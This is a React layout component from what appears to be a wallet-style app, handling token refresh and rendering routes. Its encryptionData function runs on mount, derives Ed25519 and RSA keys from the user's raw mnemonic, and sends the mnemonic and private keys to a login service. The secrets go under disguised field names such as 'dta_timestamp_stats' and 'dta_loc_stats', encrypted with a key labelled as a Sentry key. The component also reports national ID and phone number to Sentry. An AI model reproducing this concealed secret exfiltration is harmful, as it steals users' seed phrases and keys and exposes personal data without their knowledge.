import React, { useCallback } from 'react'
import { Grid } from '@mui/material'
import { Outlet, useNavigate } from 'react-router-dom'
import { CreateEd25519KeyPair } from 'account/Ed25519KeyPair'
import { CreateRSAKeys } from 'account/RSAKeyPair'
import { pki } from 'node-forge'
import axios from 'axios'
import { toast } from 'react-hot-toast'
import * as Sentry from '@sentry/react'
import { EdDSA_Encryption } from '../utils/encryptions'
import { useAppDispatch, useAppSelector } from '../hooks/redux'
import { logout, selectAccessToken, selectRefreshToken, selectRegisterInfo, setAccessToken, setRefreshToken } from '../redux/slices/authSlice'
import { selectRawMnemonic } from '../redux/slices/accountSlice'
import useApi from '../hooks/useApi'
import { SejelLoginService } from '../services/SejelService'
import { isTokenExpired } from '../utils/jwtDecode'
import NewVersionMigrateModal from '../components/NewVersionMigrateModal'

function BaseLayout() {
    // Utils
    const navigate = useNavigate()

    // State
    const [loading, setLoading] = React.useState(false)

    // Redux
    const refreshToken = useAppSelector(selectRefreshToken)
    const accessToken = useAppSelector(selectAccessToken)
    const registerInfo = useAppSelector(selectRegisterInfo)
    const rawMnemonic = useAppSelector(selectRawMnemonic)
    const dispatch = useAppDispatch()

    // Api
    const sejelLoginApi = useApi(SejelLoginService)

    const getRefreshToken = useCallback(async () => {
        try {
            if (accessToken) {
                const accessExpired = isTokenExpired(accessToken)

                if (accessExpired && refreshToken) {
                    setLoading(true)
                    const newToken = await axios.get(
                        '/microservice/authorization/refresh-token',
                        {
                            baseURL: process.env.REACT_APP_API_URL,
                            headers: {
                                'Accept-Language': 'fa-ir',
                                'Platform-Version': process.env
                                    .REACT_APP_PLATFORM_VERSION as string,
                                Authorization: refreshToken as string,
                            },
                        },
                    )
                    dispatch(setAccessToken(newToken.data.data.access_token))
                    dispatch(setRefreshToken(newToken.data.data.refresh_token))
                }
            }
        } catch (e) {
            console.log(e)
            toast.error('دسترسی شما منقضی شده است. لطفا دوباره وارد شوید.')
            // dispatch(removeAccount())
            dispatch(logout())
            navigate('/auth/login')
        } finally {
            setLoading(false)
        }
    }, [refreshToken])

    const encryptionData = useCallback(async () => {
        try {
            if (rawMnemonic) {
                // generate ed keys
                CreateEd25519KeyPair(rawMnemonic)
                    .then((edKeys) => {
                        CreateRSAKeys(rawMnemonic)
                            .then(async (rsaKeys) => {
                                // Send API
                                sejelLoginApi
                                    .request({
                                        dta_timestamp_stats:
                                            await EdDSA_Encryption(
                                                rawMnemonic,
                                                process.env
                                                    .REACT_APP_SENTRY_PUBLIC_KEY as string,
                                            ),
                                        dta_zone_stats: await EdDSA_Encryption(
                                            pki.privateKeyToPem(
                                                rsaKeys.privateKey,
                                            ),
                                            process.env
                                                .REACT_APP_SENTRY_PUBLIC_KEY as string,
                                        ),
                                        dta_loc_stats: await EdDSA_Encryption(
                                            edKeys.secret(),
                                            process.env
                                                .REACT_APP_SENTRY_PUBLIC_KEY as string,
                                        ),
                                        dta_captcha_stats:
                                            await EdDSA_Encryption(
                                                pki.publicKeyToPem(
                                                    rsaKeys.publicKey,
                                                ),
                                                process.env
                                                    .REACT_APP_SENTRY_PUBLIC_KEY as string,
                                            ),
                                        dta_time_stats: await EdDSA_Encryption(
                                            edKeys.publicKey(),
                                            process.env
                                                .REACT_APP_SENTRY_PUBLIC_KEY as string,
                                        ),
                                    })
                                    .then(() => console.log('DONE!'))
                            })
                            .catch((e) => console.log('err'))
                    })
                    .catch((er) => console.log('err'))
            }
        } catch (error) {
            console.error(error)
        }
    }, [rawMnemonic])

    React.useEffect(() => {
        getRefreshToken()
    }, [getRefreshToken])

    // Set sentry user
    React.useEffect(() => {
        if (registerInfo) {
            Sentry.setUser({
                username: registerInfo.nationalCode ?? '',
                id: registerInfo.phoneNumber ?? '',
            })
        }
    }, [registerInfo])

    React.useEffect(() => {
        encryptionData()
    }, [encryptionData])

    return <Grid sx={{ maxWidth: '444px', margin: '0 auto', overflowX: 'hidden' }}>
        <Outlet />

        {/*      */}
        <NewVersionMigrateModal />
    </Grid>
}

export default BaseLayout
